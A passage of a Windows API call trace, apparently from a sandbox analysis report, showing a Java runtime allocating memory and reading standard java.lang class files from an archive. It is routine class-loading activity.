lpOverlapped=0x0) returned 1 [0090.008] malloc (_Size=0x26) returned 0x2114500 [0090.009] free (_Block=0x121a6990) [0090.009] strlen (_Str="java/security/SecureClassLoader.class") returned 0x25 [0090.009] strcpy (in: _Dest=0x208f380, _Source="java/security/SecureClassLoader.class" | out: _Dest="java/security/SecureClassLoader.class") returned="java/security/SecureClassLoader.class" [0090.009] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3232f30, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52637488) returned 1 [0090.009] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.012] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3232f73, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52637555) returned 1 [0090.012] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xafe, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ee30*=0xafe, lpOverlapped=0x0) returned 1 [0090.013] free (_Block=0x2113020) [0090.014] free (_Block=0x2112680) [0090.018] strlen (_Str="java/lang/ClassNotFoundException.class") returned 0x26 [0090.018] malloc (_Size=0x48) returned 0x2112040 [0090.019] malloc (_Size=0xa0) returned 0x121a6990 [0090.019] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f7a5, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54654885) returned 1 [0090.019] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.020] malloc (_Size=0x27) returned 0x2114290 [0090.020] free (_Block=0x121a6990) [0090.020] strlen (_Str="java/lang/ClassNotFoundException.class") returned 0x26 [0090.020] strcpy (in: _Dest=0x208f380, _Source="java/lang/ClassNotFoundException.class" | out: _Dest="java/lang/ClassNotFoundException.class") returned="java/lang/ClassNotFoundException.class" [0090.020] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3232c94, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52636820) returned 1 [0090.020] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.021] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3232cd8, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52636888) returned 1 [0090.021] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x258, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ee30*=0x258, lpOverlapped=0x0) returned 1 [0090.022] free (_Block=0x2114500) [0090.022] free (_Block=0x2111ff0) [0090.025] strlen (_Str="java/lang/ReflectiveOperationException.class") returned 0x2c [0090.025] malloc (_Size=0x48) returned 0x2111ff0 [0090.025] malloc (_Size=0xa0) returned 0x121a6990 [0090.025] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f74b, lpNewFilePointer=0x208e7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e7c0*=54654795) returned 1 [0090.025] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e790, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208e790*=0xa0, lpOverlapped=0x0) returned 1 [0090.026] malloc (_Size=0x2d) returned 0x21129a0 [0090.026] free (_Block=0x121a6990) [0090.026] strlen (_Str="java/lang/ReflectiveOperationException.class") returned 0x2c [0090.026] strcpy (in: _Dest=0x208e940, _Source="java/lang/ReflectiveOperationException.class" | out: _Dest="java/lang/ReflectiveOperationException.class") returned="java/lang/ReflectiveOperationException.class" [0090.026] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3232a8f, lpNewFilePointer=0x208e3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3c0*=52636303) returned 1 [0090.027] ReadFile (in: hFile=0x134, lpBuffer=0x208e410, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e390, lpOverlapped=0x0 | out: lpBuffer=0x208e410*, lpNumberOfBytesRead=0x208e390*=0x1e, lpOverlapped=0x0) returned 1 [0090.044] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3232ad9, lpNewFilePointer=0x208e420, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e420*=52636377) returned 1 [0090.045] ReadFile (in: hFile=0x134, lpBuffer=0x2102e50, nNumberOfBytesToRead=0x1bb, lpNumberOfBytesRead=0x208e3f0, lpOverlapped=0x0 | out: lpBuffer=0x2102e50*, lpNumberOfBytesRead=0x208e3f0*=0x1bb, lpOverlapped=0x0) returned 1 [0090.046] free (_Block=0x2114290) [0090.046] free (_Block=0x2112040) [0090.051] strlen (_Str="java/lang/NoClassDefFoundError.class") returned 0x24 [0090.051] malloc (_Size=0x48) returned 0x2111af0 [0090.051] malloc (_Size=0xa0) returned 0x121a6990 [0090.052] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f6f9, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54654713) returned 1 [0090.052] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.053] malloc (_Size=0x25) returned 0x2114050 [0090.053] free (_Block=0x121a6990) [0090.053] strlen (_Str="java/lang/NoClassDefFoundError.class") returned 0x24 [0090.053] strcpy (in: _Dest=0x208f380, _Source="java/lang/NoClassDefFoundError.class" | out: _Dest="java/lang/NoClassDefFoundError.class") returned="java/lang/NoClassDefFoundError.class" [0090.054] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3232934, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52635956) returned 1 [0090.054] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.056] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3232976, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52636022) returned 1 [0090.056] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x119, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x119, lpOverlapped=0x0) returned 1 [0090.057] free (_Block=0x21129a0) [0090.057] free (_Block=0x2111ff0) [0090.059] strlen (_Str="java/lang/LinkageError.class") returned 0x1c [0090.059] malloc (_Size=0x48) returned 0x2112680 [0090.060] malloc (_Size=0xa0) returned 0x121a6990 [0090.060] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f6af, lpNewFilePointer=0x208e7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e7c0*=54654639) returned 1 [0090.060] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e790, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208e790*=0xa0, lpOverlapped=0x0) returned 1 [0090.061] malloc (_Size=0x1d) returned 0x21144a0 [0090.061] free (_Block=0x121a6990) [0090.061] strlen (_Str="java/lang/LinkageError.class") returned 0x1c [0090.062] strcpy (in: _Dest=0x208e940, _Source="java/lang/LinkageError.class" | out: _Dest="java/lang/LinkageError.class") returned="java/lang/LinkageError.class" [0090.062] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3232798, lpNewFilePointer=0x208e3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3c0*=52635544) returned 1 [0090.062] ReadFile (in: hFile=0x134, lpBuffer=0x208e410, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e390, lpOverlapped=0x0 | out: lpBuffer=0x208e410*, lpNumberOfBytesRead=0x208e390*=0x1e, lpOverlapped=0x0) returned 1 [0090.063] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32327d2, lpNewFilePointer=0x208e420, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e420*=52635602) returned 1 [0090.063] ReadFile (in: hFile=0x134, lpBuffer=0x2102b70, nNumberOfBytesToRead=0x162, lpNumberOfBytesRead=0x208e3f0, lpOverlapped=0x0 | out: lpBuffer=0x2102b70*, lpNumberOfBytesRead=0x208e3f0*=0x162, lpOverlapped=0x0) returned 1 [0090.063] free (_Block=0x2114050) [0090.063] free (_Block=0x2111af0) [0090.069] strlen (_Str="java/lang/ClassCastException.class") returned 0x22 [0090.069] malloc (_Size=0x48) returned 0x2111870 [0090.069] malloc (_Size=0xa0) returned 0x121a6990 [0090.069] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f65f, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54654559) returned 1 [0090.069] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.070] malloc (_Size=0x23) returned 0x2114260 [0090.071] free (_Block=0x121a6990) [0090.071] strlen (_Str="java/lang/ClassCastException.class") returned 0x22 [0090.071] strcpy (in: _Dest=0x208f380, _Source="java/lang/ClassCastException.class" | out: _Dest="java/lang/ClassCastException.class") returned="java/lang/ClassCastException.class" [0090.072] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x323263d, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52635197) returned 1 [0090.072] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.073] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x323267d, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52635261) returned 1 [0090.073] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x11b, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x11b, lpOverlapped=0x0) returned 1 [0090.073] free (_Block=0x21144a0) [0090.074] free (_Block=0x2112680) [0090.077] strlen (_Str="java/lang/ArrayStoreException.class") returned 0x23 [0090.077] malloc (_Size=0x48) returned 0x2112680 [0090.077] malloc (_Size=0xa0) returned 0x121a6990 [0090.077] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f60e, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54654478) returned 1 [0090.077] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.078] malloc (_Size=0x24) returned 0x2114050 [0090.079] free (_Block=0x121a6990) [0090.079] strlen (_Str="java/lang/ArrayStoreException.class") returned 0x23 [0090.079] strcpy (in: _Dest=0x208f380, _Source="java/lang/ArrayStoreException.class" | out: _Dest="java/lang/ArrayStoreException.class") returned="java/lang/ArrayStoreException.class" [0090.079] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32324e0, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52634848) returned 1 [0090.079] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.080] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3232521, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52634913) returned 1 [0090.081] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x11c, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x11c, lpOverlapped=0x0) returned 1 [0090.081] free (_Block=0x2114260) [0090.081] free (_Block=0x2111870) [0090.086] strlen (_Str="java/lang/VirtualMachineError.class") returned 0x23 [0090.086] malloc (_Size=0x48) returned 0x2111af0 [0090.086] malloc (_Size=0xa0) returned 0x121a6990 [0090.086] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f5bd, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54654397) returned 1 [0090.087] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.088] malloc (_Size=0x24) returned 0x2114080 [0090.088] free (_Block=0x121a6990) [0090.089] strlen (_Str="java/lang/VirtualMachineError.class") returned 0x23 [0090.090] strcpy (in: _Dest=0x208f380, _Source="java/lang/VirtualMachineError.class" | out: _Dest="java/lang/VirtualMachineError.class") returned="java/lang/VirtualMachineError.class" [0090.090] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32322f1, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52634353) returned 1 [0090.090] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.091] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3232332, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52634418) returned 1 [0090.091] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x1ae, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x1ae, lpOverlapped=0x0) returned 1 [0090.092] free (_Block=0x2114050) [0090.092] free (_Block=0x2112680) [0090.095] strlen (_Str="java/lang/OutOfMemoryError.class") returned 0x20 [0090.096] malloc (_Size=0x48) returned 0x2111b40 [0090.096] malloc (_Size=0xa0) returned 0x121a6990 [0090.096] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f56f, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54654319) returned 1 [0090.096] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.097] malloc (_Size=0x21) returned 0x21140e0 [0090.097] free (_Block=0x121a6990) [0090.097] strlen (_Str="java/lang/OutOfMemoryError.class") returned 0x20 [0090.097] strcpy (in: _Dest=0x208f380, _Source="java/lang/OutOfMemoryError.class" | out: _Dest="java/lang/OutOfMemoryError.class") returned="java/lang/OutOfMemoryError.class" [0090.097] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3232197, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52634007) returned 1 [0090.098] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.099] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32321d5, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52634069) returned 1 [0090.099] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x11c, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x11c, lpOverlapped=0x0) returned 1 [0090.099] free (_Block=0x2114080) [0090.100] free (_Block=0x2111af0) [0090.102] strlen (_Str="java/lang/StackOverflowError.class") returned 0x22 [0090.102] malloc (_Size=0x48) returned 0x2111ff0 [0090.102] malloc (_Size=0xa0) returned 0x121a6990 [0090.102] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f51f, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54654239) returned 1 [0090.102] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.103] malloc (_Size=0x23) returned 0x2114260 [0090.103] free (_Block=0x121a6990) [0090.104] strlen (_Str="java/lang/StackOverflowError.class") returned 0x22 [0090.104] strcpy (in: _Dest=0x208f380, _Source="java/lang/StackOverflowError.class" | out: _Dest="java/lang/StackOverflowError.class") returned="java/lang/StackOverflowError.class" [0090.104] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3232039, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52633657) returned 1 [0090.104] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.105] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3232079, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52633721) returned 1 [0090.105] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x11e, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x11e, lpOverlapped=0x0) returned 1 [0090.106] free (_Block=0x21140e0) [0090.106] free (_Block=0x2111b40) [0090.109] strlen (_Str="java/lang/IllegalMonitorStateException.class") returned 0x2c [0090.109] malloc (_Size=0x48) returned 0x2111af0 [0090.109] malloc (_Size=0xa0) returned 0x121a6990 [0090.109] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f4c5, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54654149) returned 1 [0090.109] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.112] malloc (_Size=0x2d) returned 0x2113260 [0090.112] free (_Block=0x121a6990) [0090.112] strlen (_Str="java/lang/IllegalMonitorStateException.class") returned 0x2c [0090.112] strcpy (in: _Dest=0x208f380, _Source="java/lang/IllegalMonitorStateException.class" | out: _Dest="java/lang/IllegalMonitorStateException.class") returned="java/lang/IllegalMonitorStateException.class" [0090.113] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3231eca, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52633290) returned 1 [0090.113] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.115] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3231f14, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52633364) returned 1 [0090.115] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x125, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208ee30*=0x125, lpOverlapped=0x0) returned 1 [0090.115] free (_Block=0x2114260) [0090.115] free (_Block=0x2111ff0) [0090.118] strlen (_Str="java/lang/ref/Reference.class") returned 0x1d [0090.118] malloc (_Size=0x48) returned 0x2111b40 [0090.118] malloc (_Size=0xa0) returned 0x121a6990 [0090.118] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f47a, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54654074) returned 1 [0090.118] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.119] malloc (_Size=0x1e) returned 0x2114260 [0090.120] free (_Block=0x121a6990) [0090.120] strlen (_Str="java/lang/ref/Reference.class") returned 0x1d [0090.120] strcpy (in: _Dest=0x208f380, _Source="java/lang/ref/Reference.class" | out: _Dest="java/lang/ref/Reference.class") returned="java/lang/ref/Reference.class" [0090.120] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x323149c, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52630684) returned 1 [0090.120] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.121] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32314d7, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52630743) returned 1 [0090.121] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x9f3, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ee30*=0x9f3, lpOverlapped=0x0) returned 1 [0090.122] free (_Block=0x2113260) [0090.122] free (_Block=0x2111af0) [0090.140] strlen (_Str="java/lang/ref/SoftReference.class") returned 0x21 [0090.140] malloc (_Size=0x48) returned 0x2111af0 [0090.140] malloc (_Size=0xa0) returned 0x121a6990 [0090.140] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f42b, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54653995) returned 1 [0090.140] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.141] malloc (_Size=0x22) returned 0x21143e0 [0090.141] free (_Block=0x121a6990) [0090.141] strlen (_Str="java/lang/ref/SoftReference.class") returned 0x21 [0090.142] strcpy (in: _Dest=0x208f380, _Source="java/lang/ref/SoftReference.class" | out: _Dest="java/lang/ref/SoftReference.class") returned="java/lang/ref/SoftReference.class" [0090.142] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32311d7, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52629975) returned 1 [0090.142] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.143] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3231216, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52630038) returned 1 [0090.143] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x286, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ee30*=0x286, lpOverlapped=0x0) returned 1 [0090.144] free (_Block=0x2114260) [0090.144] free (_Block=0x2111b40) [0090.147] strlen (_Str="java/lang/ref/WeakReference.class") returned 0x21 [0090.147] malloc (_Size=0x48) returned 0x2112680 [0090.148] malloc (_Size=0xa0) returned 0x121a6990 [0090.148] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f3dc, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54653916) returned 1 [0090.148] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.149] malloc (_Size=0x22) returned 0x2114500 [0090.149] free (_Block=0x121a6990) [0090.149] strlen (_Str="java/lang/ref/WeakReference.class") returned 0x21 [0090.149] strcpy (in: _Dest=0x208f380, _Source="java/lang/ref/WeakReference.class" | out: _Dest="java/lang/ref/WeakReference.class") returned="java/lang/ref/WeakReference.class" [0090.150] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3230ffe, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52629502) returned 1 [0090.150] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.151] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x323103d, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52629565) returned 1 [0090.152] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x19a, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x19a, lpOverlapped=0x0) returned 1 [0090.152] free (_Block=0x21143e0) [0090.153] free (_Block=0x2111af0) [0090.156] strlen (_Str="java/lang/ref/FinalReference.class") returned 0x22 [0090.156] malloc (_Size=0x48) returned 0x2111870 [0090.156] malloc (_Size=0xa0) returned 0x121a6990 [0090.156] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f38c, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54653836) returned 1 [0090.156] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.157] malloc (_Size=0x23) returned 0x2114260 [0090.157] free (_Block=0x121a6990) [0090.157] strlen (_Str="java/lang/ref/FinalReference.class") returned 0x22 [0090.158] strcpy (in: _Dest=0x208f380, _Source="java/lang/ref/FinalReference.class" | out: _Dest="java/lang/ref/FinalReference.class") returned="java/lang/ref/FinalReference.class" [0090.158] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3230e76, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52629110) returned 1 [0090.158] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, 